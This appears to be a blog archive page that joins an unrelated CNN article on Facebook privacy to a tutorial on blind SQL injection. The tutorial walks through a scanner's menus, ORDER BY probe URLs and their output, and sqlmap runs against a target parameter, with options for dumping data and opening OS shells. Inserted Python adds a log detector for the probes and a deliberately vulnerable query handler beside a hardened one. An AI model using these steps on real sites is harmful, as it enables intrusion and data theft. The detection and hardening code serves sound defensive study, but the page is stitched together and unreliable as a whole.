Facebook provides pages of instructions on how people can tighten up their privacy settings to hide their personal information from other users and outside applications.

But some observers say that too many of the site's estimated 400 million users don't know how to do so.

Microsoft researcher and social-media analyst Danah Boyd, speaking at last month's South by Southwest Interactive festival, said none of the "non-techy" users she talked to about their privacy settings knew how they were configured.

"I ask them what they think their settings are and then ask them to look at their settings with me. I have yet to find someone whose belief matched up with their reality," said Boyd, a keynote speaker at the Austin, Texas festival. "That is not good news."

In January, Facebook announced that 35 percent of its users had tweaked their privacy settings after a December change that made more information public.

To be sure, that represents millions of users. But Boyd said that can't possibly be all the people who want at least some of the privacy features that Facebook's new default settings changed.

"Are there Facebook users who want their content to be publicly accessible? Of course," she said. "But 65 percent of all Facebook users? No way."

For Facebook, it's a balancing act. The site wants to give users the privacy they've come to expect, but at the same time make information available to create experiences that will compete with other emerging applications such as Foursquare and Twitter.

Twitter, as well as photo sharing sites such as Picasa, default to open access, making them more accessible by outside applications and search engines. Facebook's material that is public can also be searched -- for example, by Google's new social search feature -- while private material cannot.

"The experience that we're trying to provide through the Facebook platform is fundamentally a social one," said Simon Axten, a manager on Facebook's public policy team. "There are some really interesting and useful applications that have come out of that development that really allow people to have a social experience that involves the people that they are friends with."

Axten said the rules of the road for developers are pretty strict. Basically, developers are instructed to collect only the data they need for their application. Anything else could land them in trouble, he said.

For example, an application that lets users send friends an electronic greeting card might need to know their birthday or anniversary. Games that require players to work together must know which other friends play the game so it can send them alerts when they need to act.

Axten said Facebook can take "a spectrum of actions" when it discovers inappropriate use of people's information -- from warning developers who may not realize they're misusing the data to disabling a developer's access to the site.

No application can access a user's most sensitive data, such as contact information, according to Facebook. And the site announced late last year that they're working on a new approval process that will require an application to more specifically state what information it wants to access.

Mike Rasmussen is president of Republic of Fun, a game company with a crowdsourcing app on Facebook that lets users give feedback and advice on current games and, in the near future, to suggest new ones. He said Facebook's list of rules for developers is a strict one.

"Developers, if they were creative, could certainly abuse it," he said. "But with Facebook, it's almost not worth it. They make it so easy to get what you really need, unless you're being malicious."

Rasmussen said his application stores a single identifier for users and does not even keep their names. He said he's only heard "second- or third-hand" about developers getting into trouble for pushing the boundaries.

Evan Brown, a Chicago technology and intellectual-property attorney, said he's not familiar with any legal cases involving private information gathered by a Facebook developer.

He said Facebook's rules governing outside developers are designed so the site may legally expel a developer easily.

"They have the sole discretion to determine what the crime is, and they have the sole discretion to determine the punishment," said Brown, who blogs about Internet legal issues.

Facebook's Axten said a team monitors complaints, which users can file simply by clicking a link that's on every Facebook application. The team also regularly monitors popular and fast-growing applications and conducts random checks, he said.

And of course there are personal settings. A user can click the "Account" tab at the top right of their Facebook home page, then scroll down to "Application Settings" and "Privacy Settings" to make changes.

Increasing awareness about that ability is what Facebook and other social-networking sites need to work harder on, Boyd said.

"While you want your services to go viral, help users walk through the value proposition first," she said. "Not through a video, but through an experience."

Article from: http://www.cnn.com/2010/TECH/ptech/04/01/facebook.developers.privacy/index.html

Thursday, April 01, 2010

Blind SQL Injection: Simple and Easy Method Using Tools


Finding Vulnerable URL & Parameter

Before you can perform Blind SQL Injection testing, you must find a URL or path on the website with a vulnerable parameter into which malicious code or characters can be injected. You need to find out why your website is vulnerable to Blind SQL injection before you can perform an SQL injection attack against the vulnerable parameter. To find a vulnerable URL path, you can use hackinganyway.py to look for possible Blind SQL injection:

Step 1: Run the hackinganyway.py Python script and enter 1 at the first menu:
############################################
 # PENETRATION TESTING FRAMEWORK PRE RELEASE# 
 # Copyright (C) 2009 By Ashikali                                 #
 # HACKING ANYWAY FRAMEWORK V 1.0                   #  
 # General Menu                                                           #
 # Ashikali1208 [at]yahoo[dot]com                                #
 # www.Ashikali.com                                                    #
 # GNU General Public License                                      #
 ############################################
 Enter 1 For Let Me In Framwork
 Enter 2 For View Special Thanks Page
 Enter 3 For Download Resource
 Enter 4 For About This Frameworks
 Enter 5 For Credit Page
 Enter 6 For Exit Completely
 Enter Your Choice Here: 1

Step 2: Select 4 if you want to use the proxy option.
################################################
#    PENETRATION TESTING FRAMEWORK PRE RELEASE         #
#    Copyright (C) 2009 By Ashikali                                          #
#    HACKING ANYWAY FRAMEWORK V 1.0                            #
#    PROXY SECTION                                                                #
#    Ashikali1208[at]yahoo[dot]com                                          #
#    www.Ashikali.com                                                             #
################################################
Do You want To Use Proxy??
Enter 1 For Enter In Main Menu With This Proxy
Enter 2 For Get The Proxy
Enter 3 For Taste The Proxy
Enter 4 For Load The Proxy
Enter 5 For Remove Proxy
Enter 6 For Change Proxy
Enter 7 For Help Of This Task
Enter 8 For Exit Fom Current Menu
Enter 9 For Exit Completely
Enter Your Choice Here: 4

Step 3: Enter the proxy address and port.
Enter the Proxy Address Here: 127.0.0.1
Enter the Port Here: 3128
[+] Testing Proxy...
[-] Proxy: 127.0.0.1:3128 Successfully Loaded
Process Done Please Press Any key To Go Back In Previous Menu...

Step 4: Select option 1 to go to the Main Menu.
 #################################################
 #    PENETRATION TESTING FRAMEWORK PRE RELEASE         #
 #    Copyright (C) 2009 By Ashikali                                         #
 #    HACKING ANYWAY FRAMEWORK V 1.0                            #
 #    PROXY SECTION                                                                #
 #    Ashikali1208 [at] yahoo [dot] com                                      #
 #    www.Ashikali.com                                                             #
 #    GNU General Public License                                               #
 #################################################
 Do You want To Use Proxy ??
 Enter 1 For Enter In Main Menu With This Proxy
 Enter 2 For Get The Proxy
 Enter 3 For Taste The Proxy
 Enter 4 For Load The Proxy
 Enter 5 For Remove Proxy
 Enter 6 For Change Proxy
 Enter 7 For Help Of This Task
 Enter 8 For Exit Fom Current Menu
 Enter 9 For Exit Completely
 Enter Your Choice Here: 1

Step 5: Select option 2 for Evaluating the Vulnerability of Target
 ################################################
 #  PENETRATION TESTING FRAMEWORK PRE RELEASE          #
 #  Copyright (C) 2009 By Ashikali                                           #
 #  HACKING ANYWAY FRAMEWORK V 1.0                             #
 #  Main Menu                                                                          #
 #  Ashikali1208[at]yahoo[dot]com                                           #
 #  www.Ashikali.com                                                              #
 #  GNU General Public License                                                #
 ################################################
 Enter 1 For Gathering Basic Information Of Target
 Enter 2 For Evaluating The vulnerability Of Target
 Enter 3 For Brute Forcing To The Target
 Enter 4 For Encryption
 Enter 5 For Attacking
 Enter 6 For Supported Tools
 Enter 7 For Help Or Detail
 Enter 8 For Changing, Removing Proxy Or For Exit From Current Menu
 Enter 9 For Exit Completly
 NOTE:- Currently You Are Using Proxy 127.0.0.1:3128
 Enter Your Choice Here : 2

Step 6: Select option 3 to find Blind SQL injection on a website.
 ################################################
 #  PENETRATION TESTING FRAMEWORK PRE RELEASE          #
 #  Copyright (C) 2009 By Ashikali                                           #
 #  WEB APPLICATION SCANNING                                           #
 #  Ashikali1208[at]yahoo[dot]com                                           #
 #  www.Ashikali.com                                                              #
 #  GNU General Public License                                                #
 ################################################
 Enter 1 For Port Scanning
 Enter 2 For Finding SQL Injection From Website
 Enter 3 For Finding Blind Injection From Website
 Enter 4 For Finding Local File Includation From Website
 Enter 5 For Finding Remote File Includation From Website
 Enter 6 For Finding Cross Site Scripting From Website
 Enter 7 For CGI Scanning
 Enter 8 For Help Of This Task
 Enter 9 for for exit from Current menu
 Enter 10 For Exit Completly
 NOTE:- Currently You Are Using Proxy 127.0.0.1:3128
 Enter which op u wana perform : 3

Step 7: Enter the website name that you want to test.
            Enter Your Site Name Here: www.mywebsite.com
If Web Identify Sucsessfully Its Will logged at webscan.txt you May check the log after scanning finished
Woot Woot Massage will Idntify That Web Is Vulnarable
[-]Saving response length for blind sqli at: http://www.mywebsite.com/viewnews.php?pageid=82+order+by+1--
[-]Saving response length for blind sqli at: http://www.mywebsite.com/viewnews.php?pageid=82+order+by+300--
[+]W00t !! Found Possible Blind sqli Bug at: http://www.mywebsite.com/viewnews.php?pageid=82+order+by+300--
[+]Possible server's hole saved at webscan.txt
[-]Saving response length for blind sqli at: http://www.mywebsite.com/news3.php?pageid=118+order+by+300--
[+]W00t !! Found Possible Blind sqli Bug at: http://www.mywebsite.com/news3.php?pageid=118+order+by+300--
[+]Possible server's hole saved at webscan.txt
[-]Saving response length for blind sqli at: http://www.mywebsite.com/news2.php?pageid=39+order+by+1--
[+]W00t !! Found Possible Blind sqli Bug at: http://www.mywebsite.com/news2.php?pageid=39+order+by+300--
[+]Possible server's hole saved at webscan.txt
        Press Any key For Going Back...

Step 8: Open the file webscan.txt. The results in webscan.txt show some possible Blind SQLi:
[+]W00t!!Found Possible Blind sqli Bug at: http://www.mywebsite.com/viewnews.php?pageid=82+order+by+300--
[+]W00t!!Found Possible Blind sqli Bug at: http://www.mywebsite.com/news3.php?pageid=118+order+by+300--
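
The scan shown above leaves a recognisable trail in the target's web server access log: the same parameter requested with "order by 1--" and then "order by 300--" from one client. The Python below is an added example for spotting that pattern, not part of hackinganyway.py or of the original post; the log lines are constructed samples in Apache combined format and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (Apache combined format). Addresses come from
# documentation ranges; paths mirror the ones in the scan output above.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2010:17:02:11 +0800] "GET /viewnews.php?pageid=82 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Apr/2010:17:03:40 +0800] "GET /viewnews.php?pageid=82+order+by+1-- HTTP/1.1" 200 5120 "-" "Python-urllib/2.6"
198.51.100.23 - - [01/Apr/2010:17:03:41 +0800] "GET /viewnews.php?pageid=82+order+by+300-- HTTP/1.1" 200 311 "-" "Python-urllib/2.6"
198.51.100.23 - - [01/Apr/2010:17:03:43 +0800] "GET /news3.php?pageid=118%20ORDER%20BY%20300-- HTTP/1.1" 200 298 "-" "Python-urllib/2.6"
203.0.113.7 - - [01/Apr/2010:17:05:02 +0800] "GET /search.php?q=sort+order+by+date HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# ORDER BY followed by a column ordinal, as sent by the scanner.
ORDER_BY_N = re.compile(r"\border\s+by\s+(\d+)", re.IGNORECASE)


def find_order_by_probes(log_text):
    """Return one record per request whose query value contains ORDER BY <n>."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # parse_qsl decodes both %20 and '+' to spaces before we match.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            probe = ORDER_BY_N.search(value)
            if probe:
                size = 0 if m["size"] == "-" else int(m["size"])
                hits.append({"ip": m["ip"], "path": url.path, "param": name,
                             "ordinal": int(probe.group(1)), "size": size})
    return hits


def length_diff_scans(hits):
    """Group hits by (ip, path, param) and keep the groups that sent two or
    more different ordinals: the pair a response-length comparison needs."""
    groups = defaultdict(dict)
    for h in hits:
        groups[(h["ip"], h["path"], h["param"])][h["ordinal"]] = h["size"]
    return {key: sizes for key, sizes in groups.items() if len(sizes) >= 2}


if __name__ == "__main__":
    found = find_order_by_probes(SAMPLE_LOG)
    for (ip, path, param), sizes in length_diff_scans(found).items():
        print(f"{ip} probed {path}?{param}= with ORDER BY ordinals "
              f"{sorted(sizes)}; response sizes {sizes}")
```

Requiring two different ordinals against the same parameter keeps a single stray match, or a search phrase such as "order by date", from raising an alert.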

 

Testing Vulnerable Parameter:
To test a vulnerable parameter with automated tools, you can use sqlmap, bsqlbf-v2, darkjumperv5.7 or other tools. To test the parameter for Blind SQL injection, I'm using sqlmap.py against the targeted URL above. You must understand how to use the sqlmap.py tool. If you do not, refer to the Help menu built into the tool (use the sqlmap.py -h command to see it).

E:\Izhar\Tool\SQL Injection\sqlmap-0.7>sqlmap.py -h
    sqlmap/0.7
    by Bernardo Damele A. G.
Usage: E:\Izhar\Tool\SQL Injection\sqlmap-0.7\sqlmap.py [options]
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v VERBOSE            Verbosity level: 0-5 (default 1)
Target:
    At least one of these options has to be specified to set the source to
    get target urls from.
    -u URL, --url=URL   Target url
    -l LIST             Parse targets from Burp or WebScarab logs
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
    --method=METHOD     HTTP method, GET or POST (default GET)
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --referer=REFERER   HTTP Referer header
    --user-agent=AGENT  HTTP User-Agent header
    -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP Authentication type (value Basic or Digest)
    --auth-cred=ACRED   HTTP Authentication credentials (value name:password)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
Injection:
These options can be used to specify which parameters to test for, provide custom injection payloads and how to parse and compare HTTP responses page content when using the blind SQL injection technique.
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --prefix=PREFIX     Injection payload prefix string
    --postfix=POSTFIX   Injection payload postfix string
    --string=STRING     String to match in page when the query is valid
    --regexp=REGEXP     Regexp to match in page when the query is valid
    --excl-str=ESTRING  String to be excluded before comparing page contents
    --excl-reg=EREGEXP  Matches to be excluded before comparing page contents
Techniques:
These options can be used to test for specific SQL injection technique or to use one of them to exploit the affected parameter(s) rather than using the default blind SQL injection technique.
    --stacked-test      Test for stacked queries (multiple statements) support
    --time-test         Test for time based blind SQL injection
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-test        Test for UNION query (inband) SQL injection
    --union-tech=UTECH  Technique to test for UNION query SQL injection
    --union-use         Use the UNION query (inband) SQL injection to retrieve
       the queries output. No need to go blind
Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS user’s password hashes (opt -U)
    --privileges        Enumerate DBMS users privileges (opt -U)
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables (opt -D)
    --columns           Enumerate DBMS database table columns (req -T opt -D)
    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
File system access:
    These options can be used to access the back-end database management
    system underlying file system.
    --read-file=RFILE   Read a file from the back-end DBMS file system
    --write-file=WFILE  Write a local file on the back-end DBMS file system
    --dest-file=DFILE   Back-end DBMS absolute filepath to write to
Operating system access:
    This option can be used to access the back-end database management
    system underlying operating system.
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay     One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          User priv escalation by abusing Windows access tokens
    --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
Miscellaneous:
    --eta               Display for each output the estimated time of arrival
    --update            Update sqlmap to the latest stable version
    -s SESSIONFILE      Save and resume all data retrieved on a session file
    --save              Save options on a configuration INI file
    --batch             Never ask for user input, use the default behaviour
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tab


sqlmap.py has a group of injection options. They can be used to specify which parameters to test, to provide custom injection payloads, and to control how HTTP response page content is parsed and compared when using the blind SQL injection technique. By default sqlmap tests all GET parameters, POST parameters, HTTP Cookie header values and the HTTP User-Agent header value for dynamicity and SQL injection vulnerability. It is also possible to specify manually, as a comma-separated list, the parameter(s) you want sqlmap to test; it then skips the dynamicity tests and runs the SQL injection tests directly against only the provided parameter(s).

The example below tests a single parameter called “pageid” to check whether it is vulnerable. If you want to test more than one parameter, separate them with commas, like this: “pageid, menuid, sid”.

E:\Izhar\Tool\SQL Injection\sqlmap-0.7>sqlmap.py -u "http://www.mywebsite.com/viewnews.php?pageid=82" -v 1 -p "pageid"
    sqlmap/0.7
    by Bernardo Damele A. G.
[*] starting at: 17:15:41
[17:15:41] [INFO] testing connection to the target url
[17:15:45] [INFO] testing if the url is stable, wait a few seconds
[17:15:48] [INFO] url is stable
[17:15:48] [INFO] testing sql injection on GET parameter 'pageid' with 0 parenthesis
[17:15:48] [INFO] testing unescaped numeric injection on GET parameter 'pageid'
[17:15:50] [INFO] confirming unescaped numeric injection on GET parameter 'pageid'
[17:15:52] [INFO] GET parameter 'pageid' is unescaped numeric injectable with 0 parenthesis
[17:15:52] [INFO] testing for parenthesis on injectable parameter
[17:15:54] [INFO] the injectable parameter requires 0 parenthesis
[17:15:54] [INFO] testing MySQL
[17:15:55] [INFO] confirming MySQL
[17:15:59] [INFO] retrieved: 6
[17:16:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 1.3.41
back-end DBMS: MySQL >= 5.0.0
[*] shutting down at: 17:16:08
E:\Izhar\Tool\SQL Injection\sqlmap-0.7

The result above shows that the pageid parameter is vulnerable to injection. You can use the other functions in sqlmap.py to perform a Blind SQL injection attack, or you can use darkMYSQLi.py or DarkjumperV5.7. If you want to use darkMYSQLi.py, you can follow my previous tutorial here: http://www.exploit-db.com/download_pdf/11716
But I’m using another tool called SimpleSQLDumper v5.1 to perform the injection attack.

I will release another article with full details later.
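
The sqlmap finding above, "unescaped numeric injectable", means the pageid value reaches the SQL statement without validation or binding. The Python below is an added example, not code from the original post or from sqlmap, that puts that flaw beside its fix and shows why the two ORDER BY probes stop producing different response lengths once the parameter is bound. It assumes an in-memory SQLite table standing in for the PHP/MySQL back end; the table, page templates and function names are hypothetical.

```python
import html
import re
import sqlite3

ERROR_PAGE = "<html><body><h1>Error</h1></body></html>"
NOT_FOUND = "<html><body><h1>No such article</h1></body></html>"


def make_db():
    """In-memory stand-in for the news table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO news VALUES (82, 'Release notes', 'Version 2 is out.')")
    return conn


def render(row):
    """Build the article page, HTML-escaping the stored values."""
    if row is None:
        return NOT_FOUND
    title, body = (html.escape(col) for col in row)
    return f"<html><body><h1>{title}</h1><p>{body}</p></body></html>"


def view_news_vulnerable(conn, pageid):
    """Unescaped numeric parameter: the raw value becomes part of the SQL."""
    sql = "SELECT title, body FROM news WHERE id = " + pageid
    try:
        return render(conn.execute(sql).fetchone())
    except sqlite3.Error:
        # A two-column SELECT cannot ORDER BY column 300, so that probe
        # lands here and the response length changes.
        return ERROR_PAGE


def view_news_hardened(conn, pageid):
    """Validate the type first, then bind the value instead of concatenating."""
    if not re.fullmatch(r"[0-9]{1,9}", pageid):
        return NOT_FOUND
    row = conn.execute("SELECT title, body FROM news WHERE id = ?",
                       (int(pageid),)).fetchone()
    return render(row)


def response_lengths(handler, conn):
    """Response lengths for the two URL-decoded probe values from the scan."""
    return [len(handler(conn, value))
            for value in ("82 order by 1--", "82 order by 300--")]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", response_lengths(view_news_vulnerable, db))
    print("hardened:  ", response_lengths(view_news_hardened, db))
```

With the vulnerable handler the two lengths differ, which is the signal the scanner logged as a possible blind SQLi; with the hardened handler both probes get the same page and a plain pageid of 82 still returns the article.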